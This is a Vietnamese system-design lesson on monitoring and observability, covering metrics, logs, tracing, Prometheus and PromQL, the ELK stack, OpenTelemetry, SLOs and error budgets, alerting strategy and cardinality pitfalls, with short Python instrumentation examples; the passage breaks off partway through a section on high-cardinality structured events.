Tuần 13: Monitoring & Observability
“Một hệ thống production không có monitoring giống như lái máy bay trong đêm mà không có bảng điều khiển — bạn không biết mình đang bay ổn hay đang lao thẳng xuống đất.”
Tags: system-design monitoring observability prometheus grafana elk opentelemetry devops security Student: Hieu Prerequisite: Tuan-11-Microservices-Pattern · Tuan-12-CICD-Pipeline Liên quan: Tuan-02-Back-of-the-envelope · Tuan-05-Load-Balancer · Tuan-09-Rate-Limiter · Tuan-14-AuthN-AuthZ-Security · Tuan-15-Data-Security-Encryption
1. Context & Why
Analogy: Bảng điều khiển buồng lái máy bay (Cockpit Dashboard)
Hieu, tưởng tượng em là phi công đang lái một chiếc Boeing 777 chở 400 hành khách xuyên Thái Bình Dương. Trong buồng lái có hàng trăm đồng hồ và màn hình:
- Altimeter (cao độ) → tương đương latency — hệ thống đang phản hồi nhanh hay chậm?
- Airspeed indicator (tốc độ) → tương đương throughput/traffic — bao nhiêu request đang đi qua?
- Fuel gauge (nhiên liệu) → tương đương saturation — CPU/memory/disk còn bao nhiêu?
- Engine warning lights (đèn cảnh báo động cơ) → tương đương error rate — có gì đang hỏng không?
- Black box recorder (hộp đen) → tương đương logs & traces — khi sự cố xảy ra, em tìm nguyên nhân từ đâu?
- ATC communication (liên lạc kiểm soát không lưu) → tương đương alerting — ai thông báo cho em khi có vấn đề?
Không phi công nào bay mù (fly blind). Nếu tất cả đồng hồ tắt, quy trình bắt buộc là hạ cánh khẩn cấp. Tương tự, nếu hệ thống production không có monitoring, em đang “bay mù” — không biết khi nào sập, không biết tại sao sập, không biết sập ở đâu.
Tại sao Monitoring & Observability quan trọng?
| Không có Monitoring | Có Monitoring & Observability |
|---|---|
| Khách hàng báo lỗi → mới biết hệ thống sập | Alert lúc 3AM → on-call engineer fix trước khi user biết |
| "Hệ thống chậm" — không biết chậm ở đâu | P99 latency tăng từ 50ms → 500ms tại service Payment |
| Debug bằng cách đọc code và đoán | Distributed trace cho thấy bottleneck ở DB query #47 |
| Capacity planning = “cảm giác” | Metrics cho thấy CPU sẽ chạm 90% trong 14 ngày |
| Postmortem = “chắc do deploy mới” | Log + trace + metrics = root cause analysis chính xác |
Monitoring vs Observability — Khác nhau thế nào?
| Monitoring | Observability | |
|---|---|---|
| Câu hỏi | "Hệ thống có đang hoạt động không?" | "Tại sao hệ thống hoạt động như vậy?" |
| Approach | Known unknowns — biết trước cần theo dõi gì | Unknown unknowns — khám phá vấn đề chưa lường trước |
| Output | Dashboard, alerts | Khả năng drill-down, correlate, explore |
| Analogy | Đèn check engine trên xe | Kỹ sư cắm máy chẩn đoán OBD-II vào xe |
| Ví dụ | CPU > 90% → alert | "Tại sao latency tăng 3x chỉ cho user ở VN vào lúc 9PM?" |
Monitoring là subset của Observability. Monitoring nói cho em biết cái gì hỏng. Observability giúp em hiểu tại sao nó hỏng — ngay cả khi em chưa từng gặp lỗi đó trước đây.
2. Deep Dive — Các khái niệm cốt lõi
2.1 Ba trụ cột của Observability (Three Pillars)
┌─────────────────────────────────────────────────┐
│ OBSERVABILITY │
│ │
│ ┌──────────┐ ┌──────────┐ ┌──────────────┐ │
│ │ METRICS │ │ LOGS │ │ TRACES │ │
│ │ │ │ │ │ │ │
│ │ "What" │ │ "Why" │ │ "Where" │ │
│ │ is │ │ did it │ │ did it │ │
│ │ happening│ │ happen │ │ happen │ │
│ └──────────┘ └──────────┘ └──────────────┘ │
│ │
│ Prometheus ELK Stack OpenTelemetry │
│ Grafana Fluentd Jaeger / Zipkin │
│ Datadog Loki │
└─────────────────────────────────────────────────┘
Pillar 1: Metrics (Số liệu đo lường)
Metrics là dữ liệu dạng số (numeric), biểu diễn trạng thái của hệ thống tại một thời điểm, được thu thập theo interval cố định.
| Metric Type | Mô tả | Ví dụ |
|---|---|---|
| Counter | Giá trị chỉ tăng, reset khi restart | http_requests_total, errors_total |
| Gauge | Giá trị tăng hoặc giảm | cpu_usage_percent, memory_used_bytes, active_connections |
| Histogram | Phân phối giá trị vào các bucket | http_request_duration_seconds (p50, p90, p99) |
| Summary | Tương tự histogram nhưng tính quantile phía client | go_gc_duration_seconds |
Khi nào dùng Histogram vs Summary?
- Histogram: Khi cần aggregate across instances (phổ biến hơn, dùng với Prometheus)
- Summary: Khi cần quantile chính xác trên single instance, không cần aggregate
Đặc điểm quan trọng của Metrics:
- Cheap to store: Mỗi data point chỉ ~16 bytes (timestamp + value)
- Fast to query: Time-series database tối ưu cho range queries
- Good for alerting: Dễ đặt threshold
- Nhược điểm: Không có context chi tiết (chỉ biết “error rate tăng”, không biết “error gì, ở đâu, cho user nào”)
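Một sketch nhỏ bằng Python minh hoạ 4 metric type ở trên (giả định dùng thư viện prometheus_client; tên metric, bucket và port 8000 chỉ là ví dụ minh hoạ):
import random
import time
from prometheus_client import Counter, Gauge, Histogram, Summary, start_http_server

# Counter: chỉ tăng, reset khi process restart
REQUESTS = Counter("http_requests_total", "Total HTTP requests", ["method", "status"])
# Gauge: tăng/giảm theo trạng thái hiện tại
ACTIVE_CONNS = Gauge("active_connections", "Số connection đang mở")
# Histogram: đếm observation vào các bucket → tính quantile phía server bằng PromQL
LATENCY = Histogram("http_request_duration_seconds", "Request latency",
                    buckets=[0.01, 0.05, 0.1, 0.2, 0.5, 1, 2])
# Summary: quantile tính sẵn phía client, không aggregate được giữa các instance
TASK_DURATION = Summary("app_task_duration_seconds", "Thời gian xử lý task")

@TASK_DURATION.time()                           # Summary đo thời gian chạy hàm
def handle_request():
    ACTIVE_CONNS.inc()
    start = time.time()
    try:
        time.sleep(random.uniform(0.01, 0.2))   # giả lập xử lý request
        REQUESTS.labels(method="GET", status="200").inc()
    finally:
        LATENCY.observe(time.time() - start)
        ACTIVE_CONNS.dec()

if __name__ == "__main__":
    start_http_server(8000)   # expose /metrics để Prometheus scrape (pull model, xem mục 2.2)
    while True:
        handle_request()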
Pillar 2: Logs (Nhật ký)
Logs là các event record rời rạc (discrete events), chứa thông tin chi tiết về điều gì đã xảy ra.
Ba dạng log phổ biến:
| Dạng | Ví dụ | Ưu điểm | Nhược điểm |
|---|---|---|---|
| Plaintext | 2024-01-15 10:30:45 ERROR Payment failed for user 123 | Dễ đọc cho người | Khó parse, khó search |
| Structured (JSON) | {"timestamp":"2024-01-15T10:30:45Z","level":"ERROR","service":"payment","user_id":"123","error":"insufficient_funds"} | Machine-parseable, filterable | Verbose hơn |
| Binary | Protobuf-encoded log | Compact, fast | Cần tool đặc biệt để đọc |
Best Practice: Luôn dùng Structured Logging (JSON). Lý do: khi hệ thống có 100 services, mỗi service 10K logs/second, em không thể grep plaintext. Em cần jq, Elasticsearch, hay Loki để filter service=payment AND level=ERROR AND user_id=123.
Structured Logging Fields chuẩn:
{
"timestamp": "2024-01-15T10:30:45.123Z",
"level": "ERROR",
"service": "payment-service",
"instance": "payment-7b4f9d8c-x2k9p",
"trace_id": "abc123def456",
"span_id": "span789",
"user_id": "usr_12345",
"method": "POST",
"path": "/api/v1/payments",
"status_code": 500,
"duration_ms": 2345,
"error": "database_connection_timeout",
"message": "Failed to process payment: connection pool exhausted"
}Pillar 3: Traces (Distributed Tracing)
Traces theo dõi một request khi nó đi qua nhiều services trong hệ thống phân tán (distributed system).
User Request (trace_id: abc-123)
│
├── [Span 1] API Gateway ─── 2ms
│ ├── [Span 2] Auth Service ─── 5ms
│ ├── [Span 3] Payment Service ─── 150ms ← Bottleneck!
│ │ ├── [Span 4] DB Query ─── 120ms ← Root cause!
│ │ └── [Span 5] Redis Cache ─── 1ms
│ └── [Span 6] Notification Svc ─── 10ms
│
Total: 168ms
Các khái niệm quan trọng:
| Term | Giải thích |
|---|---|
| Trace | Toàn bộ hành trình của 1 request qua hệ thống (gồm nhiều spans) |
| Span | Một operation đơn lẻ trong trace (ví dụ: 1 DB query, 1 HTTP call) |
| Trace ID | ID duy nhất identify toàn bộ trace, được propagate qua tất cả services |
| Span ID | ID duy nhất cho mỗi span |
| Parent Span ID | Span cha, tạo thành tree structure |
| Context Propagation | Cơ chế truyền trace_id/span_id giữa các services (thường qua HTTP headers) |
Context Propagation Headers:
traceparent: 00-abc123def456-span789-01
tracestate: vendor=value
W3C Trace Context là chuẩn (standard) được OpenTelemetry sử dụng. Trước đó mỗi vendor có format riêng (Zipkin dùng X-B3-TraceId, Jaeger dùng uber-trace-id).
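Sketch nhỏ (giả định dùng OpenTelemetry Python SDK; propagator mặc định là W3C Trace Context) cho thấy cách inject/extract header traceparent khi service này gọi service khác:
import requests
from opentelemetry import trace
from opentelemetry.propagate import inject, extract

tracer = trace.get_tracer(__name__)

def call_downstream(url):
    """Phía client: inject trace context hiện tại vào HTTP headers (thêm header traceparent)."""
    headers = {}
    inject(headers)
    return requests.get(url, headers=headers)

def handle_incoming(request_headers):
    """Phía server: extract context từ headers để span mới là con của span upstream (cùng trace_id)."""
    ctx = extract(request_headers)
    with tracer.start_as_current_span("handle_request", context=ctx) as span:
        span.set_attribute("http.method", "GET")
        # ... business logic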
2.2 Prometheus Architecture — Hệ thống Metrics tiêu chuẩn
Prometheus là monitoring system open-source, là dự án graduated của Cloud Native Computing Foundation (CNCF) — cùng cấp với Kubernetes.
Kiến trúc tổng quan
┌──────────────────────────────────────────────────────────────┐
│ PROMETHEUS ECOSYSTEM │
│ │
│ ┌─────────────┐ PULL (scrape) ┌──────────────────┐ │
│ │ Target Apps │ ◄──────────────────── │ Prometheus │ │
│ │ /metrics │ every 15s │ Server │ │
│ │ │ │ │ │
│ │ - app:8080 │ │ ┌──────────────┐│ │
│ │ - node:9100 │ │ │ Retrieval ││ │
│ │ - mysql:9104│ │ │ (Scraper) ││ │
│ └─────────────┘ │ └──────┬───────┘│ │
│ │ │ │ │
│ ┌─────────────┐ │ ┌──────▼───────┐│ │
│ │ Service │ service discovery │ │ TSDB ││ │
│ │ Discovery │───────────────────────►│ │ (Time Series ││ │
│ │ │ │ │ Database) ││ │
│ │ - k8s API │ │ └──────┬───────┘│ │
│ │ - consul │ │ │ │ │
│ │ - DNS │ │ ┌──────▼───────┐│ │
│ │ - file_sd │ │ │ PromQL ││ │
│ └─────────────┘ │ │ (Query Lang) ││ │
│ │ └──────┬───────┘│ │
│ └────────┼────────┘ │
│ │ │
│ ┌───────────────────┬───────────────────┤ │
│ │ │ │ │
│ ┌──────▼──────┐ ┌──────▼──────┐ ┌───────▼───────┐ │
│ │ Grafana │ │ Alertmanager│ │ API Consumers │ │
│ │ (Dashboard) │ │ │ │ │ │
│ │ │ │ - Routing │ │ - Custom UI │ │
│ │ - Charts │ │ - Grouping │ │ - Scripts │ │
│ │ - Alerts │ │ - Silencing │ │ - CI/CD │ │
│ │ - Tables │ │ - Inhibit │ └───────────────┘ │
│ └─────────────┘ │ │ │
│ │ ┌─────────┐│ │
│ │ │PagerDuty││ │
│ │ │Slack ││ │
│ │ │Email ││ │
│ │ └─────────┘│ │
│ └─────────────┘ │
└──────────────────────────────────────────────────────────────┘
Pull-based Model (Tại sao Prometheus “kéo” thay vì “nhận”?)
| Pull (Prometheus) | Push (Datadog, InfluxDB) | |
|---|---|---|
| Cơ chế | Prometheus chủ động gọi tới /metrics endpoint | App chủ động gửi metrics tới collector |
| Ưu điểm | Dễ biết target còn sống (nếu scrape fail → target down); Không cần config phía app | App không cần biết collector ở đâu; Tốt cho short-lived jobs |
| Nhược điểm | Cần service discovery; Khó cho short-lived jobs | Khó phát hiện target chết; DDoS risk nếu nhiều app push cùng lúc |
| Giải pháp | Dùng Pushgateway cho batch/cron jobs | Rate limiting phía collector |
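Sketch minh hoạ giải pháp Pushgateway cho batch/cron job (địa chỉ pushgateway:9091 và hàm do_backup chỉ là giả định minh hoạ):
import time
from prometheus_client import CollectorRegistry, Gauge, push_to_gateway

def do_backup():
    time.sleep(1)   # placeholder — logic backup thật của em nằm ở đây

def run_nightly_backup():
    registry = CollectorRegistry()
    duration = Gauge("backup_duration_seconds", "Thời gian chạy backup",
                     registry=registry)
    last_success = Gauge("backup_last_success_timestamp", "Unix time của lần thành công gần nhất",
                         registry=registry)

    with duration.time():            # đo thời gian chạy job
        do_backup()
    last_success.set_to_current_time()

    # Job chạy xong là thoát ngay → push metrics lên Pushgateway để Prometheus scrape từ đó
    push_to_gateway("pushgateway:9091", job="nightly_backup", registry=registry)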
TSDB — Time Series Database
Prometheus lưu dữ liệu trong TSDB tự phát triển, tối ưu cho time-series data:
Cấu trúc data:
metric_name{label1="value1", label2="value2"} value timestamp
# Ví dụ:
http_requests_total{method="GET", path="/api/users", status="200"} 15234 1705312245
http_requests_total{method="POST", path="/api/orders", status="500"} 42 1705312245
node_cpu_seconds_total{cpu="0", mode="idle"} 98234.56 1705312245
TSDB Internal Structure:
data/
├── 01BKGV7JBM69T2G1BGBGM6KB12/ # Block (2h default)
│ ├── chunks/ # Compressed time-series data
│ │ └── 000001
│ ├── tombstones # Deleted data markers
│ ├── index # Inverted index (label → series)
│ └── meta.json # Block metadata
├── 01BKGTZQ1SYQJTR4PB43C8PD98/ # Another block
├── 01BKGTZQ1HHWHV8FBJXW1Y3W0K/
├── chunks_head/ # Current (in-memory) block
│ └── 000001
└── wal/ # Write-Ahead Log
├── 000000002
└── 000000003
- Block: Mỗi block chứa data của 2 giờ (default), immutable sau khi compact
- Compaction: Blocks cũ được merge để giảm I/O khi query
- WAL (Write-Ahead Log): Đảm bảo data không mất khi crash trước khi persist vào block
- Retention: Default 15 ngày, configurable
PromQL — Prometheus Query Language
PromQL là ngôn ngữ query mạnh mẽ cho time-series data. Đây là kỹ năng bắt buộc cho mọi DevOps/SRE engineer.
Các query quan trọng nhất:
# === INSTANT VECTOR (giá trị tại 1 thời điểm) ===
# Tổng request hiện tại
http_requests_total
# Filter bằng label
http_requests_total{method="GET", status=~"2.."}
# === RANGE VECTOR (giá trị trong khoảng thời gian) ===
# Request trong 5 phút gần nhất
http_requests_total[5m]
# === FUNCTIONS ===
# Rate: số request/giây trung bình trong 5 phút (quan trọng nhất!)
rate(http_requests_total[5m])
# QPS theo method
sum by (method) (rate(http_requests_total[5m]))
# Error rate (%)
sum(rate(http_requests_total{status=~"5.."}[5m]))
/
sum(rate(http_requests_total[5m]))
* 100
# P99 latency (từ histogram)
histogram_quantile(0.99,
sum by (le) (rate(http_request_duration_seconds_bucket[5m]))
)
# P50 (median) latency per service
histogram_quantile(0.50,
sum by (le, service) (rate(http_request_duration_seconds_bucket[5m]))
)
# CPU usage (%)
100 - (avg by (instance) (rate(node_cpu_seconds_total{mode="idle"}[5m])) * 100)
# Memory usage (%)
(1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes) * 100
# Dự đoán dung lượng disk còn trống sau 30 ngày nữa (linear regression trên 7 ngày dữ liệu)
predict_linear(node_filesystem_avail_bytes[7d], 30*24*3600)
# Top 5 endpoints theo QPS
topk(5, sum by (path) (rate(http_requests_total[5m])))
# Increase (tổng tăng trong khoảng thời gian — dùng cho counter)
increase(http_requests_total{status="500"}[1h])
2.3 Grafana Dashboards
Grafana là nền tảng visualization tiêu chuẩn, hỗ trợ nhiều datasource (Prometheus, Elasticsearch, Loki, InfluxDB, CloudWatch…).
Dashboard tổ chức theo layers:
| Layer | Dashboard | Mục đích |
|---|---|---|
| Business | Revenue, Active Users, Conversion Rate | Stakeholder, Product Manager |
| Application | QPS, Latency, Error Rate, Saturation | Developers, SRE |
| Infrastructure | CPU, Memory, Disk, Network | SRE, DevOps |
| Database | Query latency, Connection pool, Replication lag | DBA, Backend |
| Network | Packet loss, Bandwidth, DNS resolution | Network Engineer |
2.4 ELK Stack — Centralized Logging
ELK = Elasticsearch + Logstash + Kibana (bây giờ thường gọi là Elastic Stack vì có thêm Beats).
┌──────────┐ ┌──────────┐ ┌───────────────┐ ┌──────────┐
│ Apps │ │ Beats │ │ Logstash │ │ Elastic │
│ │───►│(Filebeat)│───►│ │───►│ search │
│ stdout/ │ │ │ │ - Parse │ │ │
│ file log │ │ Lightwt │ │ - Transform │ │ Index & │
│ │ │ shipper │ │ - Enrich │ │ Search │
└──────────┘ └──────────┘ │ - Filter PII │ └────┬─────┘
└───────────────┘ │
┌─────▼─────┐
│ Kibana │
│ │
│ - Search │
│ - Visualize│
│ - Dashboard│
│ - Alerting │
└───────────┘
Mỗi component đóng vai trò gì?
| Component | Vai trò | Analogy |
|---|---|---|
| Beats (Filebeat) | Lightweight agent, đọc log files và forward | Bưu tá thu thư ở mỗi nhà |
| Logstash | Data processing pipeline: parse, transform, enrich, filter | Bưu điện phân loại thư |
| Elasticsearch | Distributed search & analytics engine, lưu trữ + index logs | Thư viện khổng lồ có catalog |
| Kibana | Web UI để search, visualize, tạo dashboard | Thủ thư giúp tìm sách |
Alternative nhẹ hơn: PLG Stack (Promtail + Loki + Grafana) — Grafana Loki thiết kế giống Prometheus nhưng cho logs, index chỉ labels (không full-text index như Elasticsearch), rẻ hơn nhiều về storage.
2.5 Distributed Tracing — OpenTelemetry, Jaeger, Zipkin
OpenTelemetry (OTel)
OpenTelemetry là chuẩn mở (open standard) cho observability, merge từ OpenTracing + OpenCensus. Đây là CNCF project, vendor-neutral.
Tại sao OTel quan trọng?
- Vendor lock-in elimination: Instrument 1 lần, export tới bất kỳ backend (Jaeger, Zipkin, Datadog, New Relic, Grafana Tempo…)
- Unified API: Một SDK cho cả Metrics + Logs + Traces
- Auto-instrumentation: Libraries cho hầu hết framework (Express, Flask, Spring Boot…)
- Industry standard: AWS, Google, Microsoft, Datadog đều support
┌─────────────────────────────────────────────────────────┐
│ OPENTELEMETRY ARCHITECTURE │
│ │
│ ┌──────────┐ ┌──────────┐ ┌──────────┐ │
│ │ Service A│ │ Service B│ │ Service C│ │
│ │ (OTel │ │ (OTel │ │ (OTel │ │
│ │ SDK) │ │ SDK) │ │ SDK) │ │
│ └────┬─────┘ └────┬─────┘ └────┬─────┘ │
│ │ │ │ │
│ └──────────────┼──────────────┘ │
│ │ │
│ ┌───────▼────────┐ │
│ │ OTel Collector│ │
│ │ │ │
│ │ ┌────────────┐ │ │
│ │ │ Receivers │ │ OTLP, Jaeger, Zipkin │
│ │ └─────┬──────┘ │ │
│ │ ┌─────▼──────┐ │ │
│ │ │ Processors │ │ Batch, Filter, Sample │
│ │ └─────┬──────┘ │ │
│ │ ┌─────▼──────┐ │ │
│ │ │ Exporters │ │ Jaeger, Zipkin, OTLP │
│ │ └─────┬──────┘ │ │
│ └───────┼────────┘ │
│ │ │
│ ┌────────────┼────────────┐ │
│ │ │ │ │
│ ┌────▼───┐ ┌─────▼────┐ ┌───▼──────┐ │
│ │ Jaeger │ │ Grafana │ │ Datadog │ │
│ │ │ │ Tempo │ │ / others │ │
│ └────────┘ └──────────┘ └──────────┘ │
└─────────────────────────────────────────────────────────┘
Jaeger vs Zipkin
| Jaeger | Zipkin | |
|---|---|---|
| Tác giả | Uber (CNCF graduated) | Twitter (open-source) |
| Ngôn ngữ | Go | Java |
| Storage | Cassandra, Elasticsearch, Kafka, Badger | Cassandra, Elasticsearch, MySQL |
| UI | Richer, dependency graph | Simpler, lightweight |
| Sampling | Adaptive sampling (head + tail) | Fixed-rate sampling |
| Khi nào dùng | Production lớn, cần adaptive sampling | Setup nhanh, hệ thống nhỏ-trung |
2.6 SLO / SLA / SLI — Ngôn ngữ chung của Reliability
Ba khái niệm này là nền tảng của Site Reliability Engineering (SRE), được Google popularize.
| Term | Viết tắt của | Giải thích | Ví dụ |
|---|---|---|---|
| SLI | Service Level Indicator | Metric đo lường quality of service | Tỷ lệ request thành công: 99.95% |
| SLO | Service Level Objective | Mục tiêu nội bộ cho SLI | "99.9% request phải trả về trong < 200ms" |
| SLA | Service Level Agreement | Hợp đồng với khách hàng, có hậu quả nếu vi phạm | "Nếu uptime < 99.95%, khách được hoàn 10% phí" |
Quan hệ: SLI (đo) → SLO (mục tiêu nội bộ, chặt hơn SLA) → SLA (cam kết với khách hàng)
Ví dụ cụ thể cho một API service:
| SLI | SLO | SLA |
|---|---|---|
| Availability (% request success) | 99.95% trong 30 ngày | 99.9% — vi phạm thì credit 10% |
| Latency P99 | < 200ms | < 500ms — vi phạm thì credit 5% |
| Error rate | < 0.05% | < 0.1% — vi phạm thì credit 5% |
Error Budget — Ngân sách lỗi
Error Budget = lượng “lỗi cho phép” dựa trên SLO. Đây là khái niệm cực kỳ quan trọng vì nó biến reliability thành con số đo được.
Ví dụ: SLO = 99.9% availability trong 30 ngày → error budget = 0.1% × 30 ngày × 24 giờ × 60 phút ≈ 43.2 phút downtime cho phép mỗi tháng.
Error Budget Policy (chính sách khi ngân sách cạn):
| Error Budget remaining | Action |
|---|---|
| > 50% | Normal development, deploy freely |
| 25% – 50% | Tăng review, limit risky deploys |
| 5% – 25% | Feature freeze, focus stability |
| 0% (exhausted) | Code freeze — chỉ được fix bugs và improve reliability |
Aha Moment: Error budget tạo cân bằng giữa velocity (ship features nhanh) và reliability (hệ thống ổn định). Không còn tranh cãi “Dev muốn deploy, Ops muốn stable” — error budget là con số khách quan.
2.7 Golden Signals — 4 tín hiệu vàng (Google SRE Book)
Google đề xuất 4 metrics quan trọng nhất cần monitor cho mọi service:
| Signal | Giải thích | PromQL Example |
|---|---|---|
| Latency | Thời gian xử lý request (phân biệt success vs error latency) | histogram_quantile(0.99, sum by(le)(rate(http_request_duration_seconds_bucket[5m]))) |
| Traffic | Lượng demand (request/s, transactions/s) | sum(rate(http_requests_total[5m])) |
| Errors | Tỷ lệ request thất bại (explicit 5xx, implicit: wrong result) | sum(rate(http_requests_total{status=~"5.."}[5m])) / sum(rate(http_requests_total[5m])) |
| Saturation | Mức độ “đầy” của resource (CPU, memory, disk, connections) | (1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes) |
Tại sao 4 signals này đủ? Vì chúng cover 4 câu hỏi: “Có chậm không?” (Latency), “Có nhiều không?” (Traffic), “Có lỗi không?” (Errors), “Có quá tải không?” (Saturation).
2.8 RED Method vs USE Method
Hai framework bổ sung cho Golden Signals, apply cho các loại component khác nhau:
RED Method (cho Services/Microservices — Tom Wilkie, Grafana Labs)
| Metric | Giải thích | Áp dụng |
|---|---|---|
| Rate | Requests per second | Mọi service |
| Errors | Failed requests per second | Mọi service |
| Duration | Distribution of request latency | Mọi service |
RED = Golden Signals trừ Saturation. Tập trung vào user experience.
USE Method (cho Resources/Infrastructure — Brendan Gregg, Netflix)
| Metric | Giải thích | Áp dụng |
|---|---|---|
| Utilization | % thời gian resource bận | CPU, Disk, Network |
| Saturation | Lượng work bị queued/pending | Queue depth, swap usage |
| Errors | Error events | Hardware errors, network drops |
USE áp dụng cho từng hardware resource: CPU, Memory, Disk I/O, Network I/O.
Khi nào dùng gì?
| Đối tượng | Dùng | Ví dụ |
|---|---|---|
| API endpoint | RED | /api/v1/payments — Rate, Errors, Duration |
| Kubernetes pod | USE | CPU utilization, memory saturation, OOM errors |
| Database | Cả hai | RED cho queries; USE cho disk I/O, connections |
| Message queue | USE | Queue depth (saturation), consumer lag, message errors |
2.9 Alerting Strategy — Chiến lược cảnh báo
Severity Levels
| Level | Khi nào | Response Time | Ai nhận | Kênh |
|---|---|---|---|---|
| P1 / Critical | Service down, data loss, security breach | < 5 phút | On-call engineer + manager | PagerDuty (phone call), SMS |
| P2 / High | Degraded performance, partial outage | < 30 phút | On-call engineer | PagerDuty, Slack incidents |
| P3 / Warning | Approaching threshold, non-critical error spike | < 4 giờ (business hours) | Team lead | Slack alerts |
| P4 / Info | Anomaly detected, capacity planning | Next business day | Team via weekly review | Email, dashboard |
Escalation Policy
Time 0 → On-call Primary receives alert
↓ (no ack in 5 min)
Time +5m → On-call Secondary receives alert
↓ (no ack in 10 min)
Time +15m → Engineering Manager receives alert
↓ (no ack in 15 min)
Time +30m → VP Engineering / CTO receives alert
↓ (auto-conference bridge opened)
Time +45m → Incident Commander declared, war room
Alerting Best Practices
| Do | Don’t |
|---|---|
| Alert on symptoms (user-facing: latency, errors) | Alert on causes (CPU high — might be fine during batch job) |
| Set alerts based on SLO burn rate | Set arbitrary thresholds without SLO context |
| Use multi-window alerting (5min AND 1hr) | Alert on single data point (noisy) |
| Include runbook link in alert | Send alert with no context or action |
| Page only for user-impacting issues | Page for every warning (alert fatigue) |
| Review and tune alerts monthly | Set and forget |
SLO-based Alerting (Google’s Burn Rate)
Thay vì alert “error rate > 1%”, dùng burn rate — tốc độ tiêu thụ error budget:
Ví dụ: SLO = 99.9% (error budget = 0.1%), observed error rate = 0.5% → burn rate = 0.5% / 0.1% = 5x.
→ Đang tiêu error budget nhanh gấp 5 lần cho phép. Nếu tiếp tục, error budget sẽ cạn trong 30 / 5 = 6 ngày thay vì 30 ngày.
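Một sketch nhỏ để em tự kiểm tra lại con số trên (giả định window SLO là 30 ngày):
def burn_rate_report(slo: float, observed_error_rate: float, window_days: int = 30):
    """Tính burn rate và số ngày còn lại trước khi error budget cạn."""
    error_budget = 1 - slo                      # ví dụ: SLO 99.9% → budget 0.1%
    burn_rate = observed_error_rate / error_budget
    days_to_exhaustion = window_days / burn_rate if burn_rate > 0 else float("inf")
    return burn_rate, days_to_exhaustion

# Ví dụ trong bài: SLO 99.9%, error rate quan sát được 0.5%
rate, days = burn_rate_report(slo=0.999, observed_error_rate=0.005)
print(f"burn rate = {rate:.1f}x, budget cạn sau ~{days:.0f} ngày")   # 5.0x, ~6 ngày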
Multi-window alerting rules:
| Severity | Burn Rate | Short Window | Long Window | Alert After |
|---|---|---|---|---|
| P1 | 14.4x | 5 phút | 1 giờ | Tức thì — budget cạn trong 2 ngày |
| P2 | 6x | 30 phút | 6 giờ | Budget cạn trong 5 ngày |
| P3 | 1x | 6 giờ | 3 ngày | Budget đang tiêu đúng tốc độ cạn cuối tháng |
2.10 Cardinality Explosion Problem — Bẫy chết người
Cardinality = số lượng unique time series (unique combinations of metric name + label values).
Ví dụ an toàn:
http_requests_total{method="GET", status="200"} # method: ~5 values, status: ~10 values
# Cardinality = 5 × 10 = 50 series → OK
Ví dụ NGUY HIỂM:
http_requests_total{method="GET", user_id="usr_12345", request_id="req_abc"}
# user_id: 10M values, request_id: infinite
# Cardinality = 5 × 10M × ∞ = EXPLOSION 💥
Tại sao cardinality explosion nguy hiểm?
| Hệ quả | Chi tiết |
|---|---|
| Memory OOM | Prometheus giữ tất cả active series trong RAM |
| Query timeout | PromQL query trên 10M series → CPU 100% |
| Disk explosion | Mỗi series ~16 bytes/sample × 4 samples/phút × 10M series = 640MB/phút ≈ 922GB/ngày |
| Billing shock | Nếu dùng managed service (Datadog, Grafana Cloud) → mỗi custom metric = $$$ |
Quy tắc vàng: KHÔNG BAO GIỜ dùng high-cardinality values làm label:
- User ID
- Request ID / Trace ID
- IP address
- URL path (nếu có path params: /users/123 → vô hạn)
Thay vào đó: Dùng labels với bounded cardinality (method, status_code, service_name, region, pod_name). Nếu cần user-level data → dùng Logs hoặc Traces, không phải Metrics.
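Sketch minh hoạ label tốt vs label xấu với prometheus_client (tên metric và hàm normalize_path chỉ là ví dụ giả định):
import re
from prometheus_client import Counter, Histogram

# ĐÚNG: label có cardinality bị chặn (bounded) → vài chục đến vài trăm series
REQUESTS = Counter("http_requests_total", "Total requests",
                   ["method", "status", "service"])
REQUESTS.labels(method="GET", status="200", service="payment").inc()

# SAI: user_id / request_id là unbounded → mỗi giá trị mới = 1 time series mới
# BAD = Counter("bad_requests_total", "desc", ["user_id", "request_id"])  # đừng làm vậy!

def normalize_path(path: str) -> str:
    """Đưa path về route template trước khi dùng làm label (regex đơn giản, chỉ minh hoạ)."""
    return re.sub(r"/\d+", "/{id}", path)   # /users/123/orders/456 → /users/{id}/orders/{id}

LATENCY = Histogram("http_request_duration_seconds", "Latency theo route", ["path"])
LATENCY.labels(path=normalize_path("/users/123/orders/456")).observe(0.042)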
2.11 Modern Observability — High-Cardinality Structured Events
Cập nhật 2024-2026: Honeycomb-style "high-cardinality structured events" đang dần thay thế cách tách bạch Metrics + Logs + Traces truyền thống. Đây là quan điểm hiện đại được Charity Majors (CTO Honeycomb) và Liz Fong-Jones hệ thống hoá trong sách "Observability Engineering" (O'Reilly 2022).
2.11.1 Vấn đề của 3-Pillars truyền thống
Section 2.1 trên mô tả 3 trụ cột Metrics + Logs + Traces. Nhưng trong production hiện đại, cách tiếp cận này có 4 vấn đề lớn:
| Vấn đề | Chi tiết |
|---|---|
| Pre-aggregation kills detail | Metrics chỉ có aggregate (P99 = 200ms) — không biết WHO bị 200ms |
| Cardinality limits | Metrics không kham được user_id, request_id labels |
| 3 silos khó correlate | Metric tăng → tìm log → tìm trace = 3 tools, 3 query languages |
| "Known unknowns" only | Phải biết trước cần monitor gì → "unknown unknowns" không thấy |
2.11.2 Giải pháp: High-Cardinality Structured Events
Quan điểm cốt lõi: Mỗi request emit 1 wide event với hàng trăm fields:
{
"timestamp": "2026-05-01T10:30:45.123Z",
"service": "checkout-api",
"instance": "checkout-7b4f9d8c-x2k9p",
"region": "us-east-1",
"trace_id": "abc123",
"span_id": "span789",
"user_id": "usr_12345",
"user_tier": "premium",
"user_country": "VN",
"session_id": "sess_xyz",
"request_method": "POST",
"request_path": "/api/v1/checkout",
"request_size_bytes": 2048,
"response_status": 200,
"response_size_bytes": 512,
"duration_ms": 234,
"db_query_count": 5,
"db_total_time_ms": 145,
"cache_hit": true,
"cache_lookup_count": 3,
"feature_flag_a": true,
"feature_flag_b": false,
"experiment_arm": "control",
"build_id": "v2.45.1",
"deploy_id": "deploy-abc",
"downstream_service": "payment-api",
"downstream_duration_ms": 89,
"downstream_retry_count": 1,
"error": null,
"error_message": null,
"warnings": ["slow_query"]
}
Mỗi field là một dimension để slice/dice.
Tại sao tốt hơn:
- Có thể query: “P99 latency cho premium users tại VN với feature flag A bật, ở build v2.45.1, sau deploy gần đây”
- “Unknown unknowns” → drill-down dynamic, không cần predefine dashboard
